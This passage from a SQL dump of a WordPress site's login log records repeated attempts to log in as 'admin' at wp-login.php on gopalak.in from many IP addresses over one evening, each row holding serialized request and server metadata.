Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56200\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746892221.9918649;s:12:\"REQUEST_TIME\";i:1746892221;}}','198.54.114.98',0,'2025-05-10 21:20:23','1970-01-01 00:00:00'),(95329,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34726\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.183\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746893448.1445661;s:12:\"REQUEST_TIME\";i:1746893448;}}','198.187.29.183',0,'2025-05-10 21:40:49','1970-01-01 00:00:00'),(95330,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44726\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.48.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746894047.5392239;s:12:\"REQUEST_TIME\";i:1746894047;}}','54.39.48.216',0,'2025-05-10 21:50:49','1970-01-01 00:00:00'),(95331,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37522\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.102\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746894629.602246;s:12:\"REQUEST_TIME\";i:1746894629;}}','199.188.201.102',0,'2025-05-10 22:00:31','1970-01-01 00:00:00'),(95332,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44014\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746895192.9895279;s:12:\"REQUEST_TIME\";i:1746895192;}}','198.54.114.18',0,'2025-05-10 22:09:54','1970-01-01 00:00:00'),(95333,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"14038\";s:11:\"REMOTE_ADDR\";s:13:\"185.88.153.48\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746895727.9963181;s:12:\"REQUEST_TIME\";i:1746895727;}}','185.88.153.48',0,'2025-05-10 22:18:49','1970-01-01 00:00:00'),(95334,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48242\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.104.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746896256.286514;s:12:\"REQUEST_TIME\";i:1746896256;}}','134.209.104.76',0,'2025-05-10 22:27:38','1970-01-01 00:00:00'),(95335,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49814\";s:11:\"REMOTE_ADDR\";s:15:\"104.219.248.236\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746896775.8724861;s:12:\"REQUEST_TIME\";i:1746896775;}}','104.219.248.236',0,'2025-05-10 22:36:17','1970-01-01 00:00:00'),(95336,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53274\";s:11:\"REMOTE_ADDR\";s:12:\"66.85.157.26\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746897288.688623;s:12:\"REQUEST_TIME\";i:1746897288;}}','66.85.157.26',0,'2025-05-10 22:44:50','1970-01-01 00:00:00'),(95337,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51586\";s:11:\"REMOTE_ADDR\";s:15:\"186.209.113.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746897802.341743;s:12:\"REQUEST_TIME\";i:1746897802;}}','186.209.113.104',0,'2025-05-10 22:53:24','1970-01-01 00:00:00'),(95338,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58270\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.209.9\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746898312.5152791;s:12:\"REQUEST_TIME\";i:1746898312;}}','162.0.209.9',0,'2025-05-10 23:01:54','1970-01-01 